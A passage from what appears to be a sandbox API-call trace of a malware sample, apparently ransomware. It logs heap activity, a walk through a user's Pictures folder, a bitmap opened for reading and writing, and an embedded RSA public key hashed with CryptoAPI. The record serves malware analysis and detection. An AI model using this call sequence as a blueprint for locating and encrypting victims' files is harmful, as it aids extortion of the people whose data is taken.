returned 1 [0190.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.241] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\") returned="ymOmNEPhoB\\" [0190.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0190.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d395b8 [0190.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.242] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\") returned="Pictures\\" [0190.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0190.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d395b8 | out: hHeap=0x6a0000) returned 1 [0190.243] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0190.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0190.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0190.243] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0190.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0190.243] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0190.243] PathFindFileNameW (pszPath="") returned="" [0190.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd28 [0190.244] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\*" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85824980, ftCreationTime.dwHighDateTime=0x1d8a3a1, ftLastAccessTime.dwLowDateTime=0x668dc460, ftLastAccessTime.dwHighDateTime=0x1d8a477, ftLastWriteTime.dwLowDateTime=0x668dc460, ftLastWriteTime.dwHighDateTime=0x1d8a477, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0190.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd28 | out: hHeap=0x6a0000) returned 1 [0190.246] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85824980, ftCreationTime.dwHighDateTime=0x1d8a3a1, ftLastAccessTime.dwLowDateTime=0x668dc460, ftLastAccessTime.dwHighDateTime=0x1d8a477, ftLastWriteTime.dwLowDateTime=0x668dc460, ftLastWriteTime.dwHighDateTime=0x1d8a477, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0190.246] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc02b380, ftCreationTime.dwHighDateTime=0x1d8a1ce, ftLastAccessTime.dwLowDateTime=0x6d1210b0, ftLastAccessTime.dwHighDateTime=0x1d8a64e, ftLastWriteTime.dwLowDateTime=0x6d1210b0, ftLastWriteTime.dwHighDateTime=0x1d8a64e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7Q5_45ijmfP9bA", cAlternateFileName="7Q5_45~1")) returned 1 [0190.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0190.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2d2ed20 [0190.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2d2ed98 [0190.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ed20 | out: hHeap=0x6a0000) returned 1 [0190.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0190.247] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43afb100, ftCreationTime.dwHighDateTime=0x1d8a284, ftLastAccessTime.dwLowDateTime=0x3af16be0, ftLastAccessTime.dwHighDateTime=0x1d8a5df, ftLastWriteTime.dwLowDateTime=0x3af16be0, ftLastWriteTime.dwHighDateTime=0x1d8a5df, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="d7pQIdSiE6laiAyeoE", cAlternateFileName="D7PQID~1")) returned 1 [0190.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0190.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea898 [0190.247] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe730ce80, ftCreationTime.dwHighDateTime=0x1d898f3, ftLastAccessTime.dwLowDateTime=0x4ed80dc0, ftLastAccessTime.dwHighDateTime=0x1d89cb7, ftLastWriteTime.dwLowDateTime=0x4ed80dc0, ftLastWriteTime.dwHighDateTime=0x1d89cb7, nFileSizeHigh=0x0, nFileSizeLow=0xe120, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="E07daaq0LDB.bmp", cAlternateFileName="E07DAA~1.BMP")) returned 1 [0190.247] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\E07daaq0LDB.bmp") returned=".bmp" [0190.247] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\E07daaq0LDB.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\e07daaq0ldb.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0190.248] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=57632) returned 1 [0190.248] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0190.251] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xe0fa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.251] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0190.252] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0190.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0190.253] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.253] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xe120, lpOverlapped=0x0) returned 1 [0190.254] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0190.254] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.254] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.254] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0190.255] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0190.255] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0190.255] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0190.255] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0190.255] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0190.255] GetLastError () returned 0x0 [0190.255] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0190.255] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0190.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0190.256] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0190.256] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0190.256] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0190.256] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0190.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0190.256] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0190.256] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xe120) returned 0x2d45778 [0190.256] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0190.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0190.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0190.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0190.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0190.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0190.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d395b8 [0190.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39aa8 [0190.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d39600 [0190.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ac0 [0190.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39af0 [0190.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b50 [0190.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b08 [0190.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0190.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0190.257] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0190.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0190.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39af0 | out: hHeap=0x6a0000) returned 1 [0190.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b08 | out: hHeap=0x6a0000) returned 1 [0190.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b50 | out: hHeap=0x6a0000) returned 1 [0190.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0190.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b50 [0190.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0190.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b08 [0190.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0190.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39af0 [0190.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0190.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0190.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0190.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0190.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0190.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0190.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0190.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0190.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0190.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b08 | out: hHeap=0x6a0000) returned 1 [0190.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0190.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39af0 | out: hHeap=0x6a0000) returned 1 [0190.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0190.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0190.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b50 | out: hHeap=0x6a0000) returned 1 [0190.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0190.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0190.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0190.260] GetCurrentThreadId () returned 0x264 [0190.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0190.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d443f0 [0190.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0190.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0190.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0190.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0190.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0190.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0190.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.261] GetCurrentThreadId () returned 0x264 [0190.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0190.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0190.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0190.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0190.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0190.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0190.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0190.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0190.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b50 [0190.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0190.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0190.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0190.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0190.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0190.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0190.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0190.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0190.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39af0 [0190.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0190.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0190.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0190.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0190.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0190.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0190.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0190.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b08 [0190.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0190.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0190.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0190.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ad8 [0190.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0190.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b68 [0190.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0190.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0190.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0190.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b38 [0190.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0190.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b20 [0190.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0190.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b80 [0190.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b20 | out: hHeap=0x6a0000) returned 1 [0190.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b20 [0190.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b38 | out: hHeap=0x6a0000) returned 1 [0190.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0190.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0190.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0190.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0190.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0190.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39af0 | out: hHeap=0x6a0000) returned 1 [0190.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39af0 [0190.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0190.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0190.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b50 | out: hHeap=0x6a0000) returned 1 [0190.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0190.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b80 | out: hHeap=0x6a0000) returned 1 [0190.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0190.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0190.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0190.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0190.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0190.264] HeapFree (in: 